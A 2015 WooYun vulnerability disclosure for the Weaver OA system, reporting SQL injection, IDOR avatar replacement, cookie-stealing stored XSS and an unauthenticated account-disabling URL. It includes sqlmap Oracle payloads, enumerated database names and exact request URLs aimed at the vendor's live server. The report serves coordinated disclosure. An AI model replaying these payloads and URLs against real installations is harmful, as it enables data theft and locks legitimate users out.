当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125738

漏洞标题:泛微OA系统漏洞缺陷打包

相关厂商:泛微

漏洞作者: 浮萍

提交时间:2015-07-13 16:27

修复时间:2015-08-31 15:22

公开时间:2015-08-31 15:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-17: 厂商已经确认,细节仅向厂商公开
2015-07-27: 细节向核心白帽子及相关领域专家公开
2015-08-06: 细节向普通白帽子公开
2015-08-16: 细节向实习白帽子公开
2015-08-31: 细节向公众公开

简要描述:

一些小问题打包
包括XSS、越权、未授权修改、SQL注入(需登录)

详细说明:

首先以官方为例:
http://pm.weaver.cn:9085
首先获取一个用户,用于测试登录

Snap8.jpg


Snap9.jpg


一、多处SQL注入
好多地方都没有过滤,导致SQL注入,这里举两例
第一处:
http://pm.weaver.cn:9085/ServiceAction/com.eweaver.workflow.request.servlet.RequestlogAction?action=getrelog&requestid=402880484c2a7512014e52de46894dc5

Snap10.jpg


Snap11.jpg


需Cookie

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: requestid
    Type: error-based
    Title: Oracle OR error-based - WHERE or HAVING clause (XMLType)
    Payload: action=getrelog&requestid=-9685' OR 6188=(SELECT UPPER(XMLType(CHR(
60)||CHR(58)||CHR(113)||CHR(99)||CHR(99)||CHR(106)||CHR(113)||(SELECT (CASE WHEN
 (6188=6188) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(99)||CHR(104)
||CHR(113)||CHR(62))) FROM DUAL) AND 'Nbft'='Nbft
    Type: AND/OR time-based blind
    Title: Oracle OR time-based blind
    Payload: action=getrelog&requestid=-3439' OR 4091=DBMS_PIPE.RECEIVE_MESSAGE(
CHR(97)||CHR(113)||CHR(105)||CHR(115),5) AND 'MGZp'='MGZp
---


available databases [37]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EWEAVER
[*] EWEAVER5TEST
[*] EWEAVERINHOUSE
[*] EWEAVERTEST
[*] EXFSYS
[*] FTOA01
[*] FTPOM
[*] HR
[*] HTF
[*] IX
[*] MDSYS
[*] MOBILEDEMO
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] PMECOLOGY
[*] POWER
[*] POWER01
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEAVERIM
[*] WFPM
[*] WMSYS
[*] XDB
[*] ZTDBA
[*] ZTKG
[*] ZZB
[*] ZZBMIS3


第二处:
http://pm.weaver.cn:9085/ServiceAction/com.eweaver.base.orgunit.servlet.OrgunitTreeAction?action=getChildrenExt&type=orgdef&sqlwhere=&node=Orgunit_402881e70ad1d990010ad1e5ec930008&reftype=402881e510e8223c0110e83d427f0018

Snap13.jpg


Snap14.jpg


其实有好多处,这里不再举例
二、越权
这里以修改他人照片为例
打开个人中心的个人信息

Snap15.jpg


然后单击上传图像的地方
这里抓包有一个get请求
复制这个请求
http://pm.weaver.cn:9085/humres/base/uploadavatar.jsp?id=402880483685a23b0136a4318b4f25c7
首先查看id为402880723028d31d013028e820530012的人的信息(URL:http://pm.weaver.cn:9085/humres/base/humresview.jsp?id=402880723028d31d013028e820530012)

Snap17.jpg


将id换为他人的id(id可以在点开别人的信息时url中有)
例如将402880483685a23b0136a4318b4f25c7替换为402880723028d31d013028e820530012

http://pm.weaver.cn:9085/humres/base/uploadavatar.jsp?id=402880723028d31d013028e820530012


然后点击上传

Snap19.jpg


这里选择了一只企鹅
然后再次查看

Snap20.jpg


测试成功。
然后再给替换回去。。。
三、XSS
个人中心->个人信息->详细信息
英文名称

Snap21.jpg


Snap22.jpg


cookie

Snap23.jpg


用其他人的账号查看

Snap25.jpg


Snap26.jpg


Snap27.jpg


Snap28.jpg


四、未授权修改(无需登录)
http://pm.weaver.cn:9085/ServiceAction/com.eweaver.base.security.servlet.SysuserAction?action=modifyAccountStatus&id=用户id&v=0&fieldName=isclosed
其中参数v用来控制该用户是否能登录
也就是sysuser表中isclosed字段
这里不拿官方的演示了

漏洞证明:

这里举一个案例吧
http//*.*.*.*/ServiceAction/com.eweaver.base.security.servlet.SysuserAction?action=modifyAccountStatus&id=用户ID&v=0&fieldName=isclosed
开启

Snap29.jpg


关闭
http//*.*.*.*/ServiceAction/com.eweaver.base.security.servlet.SysuserAction?action=modifyAccountStatus&id=用户ID&v=1&fieldName=isclosed

Snap30.jpg


然后再次登录的时候就会闪退

修复方案:

版权声明:转载请注明来源 浮萍@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-07-17 15:21

厂商回复:

CNVD确认所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无